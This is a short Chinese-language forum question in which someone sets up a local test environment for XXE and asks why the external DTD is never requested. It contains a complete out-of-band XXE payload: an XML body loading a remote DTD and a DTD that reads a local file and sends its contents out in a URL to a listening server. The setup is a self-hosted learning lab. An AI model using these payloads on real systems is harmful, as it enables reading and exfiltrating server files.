我正在为XXE漏洞设置测试服务器。所以我正在运行2个python简单服务器,一个是localhost:8000上的SimpleHTTPserver,另一个是localhost:8900上的xml-rcp。现在,当我发送带有XML的POST时,它应该转到8000上的http服务器并下载test.dtd,在其中执行其余代码,但根据HTTPServer,没有对该文件的请求。我在做什么错了?
POST数据-
<?xml version="1.0" ?>
<!DOCTYPE a [
<!ENTITY % asd SYSTEM "http://127.0.0.1:8000/test.dtd">
%asd;
%c;
]>
<a>&rrr;</a>
TEST.dtd-
<!ENTITY % d SYSTEM "file://test">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'http://127.0.0.1:8000/%d;'>">
最终答案应读取位于127.0.0.1:8000/test的测试文件的内容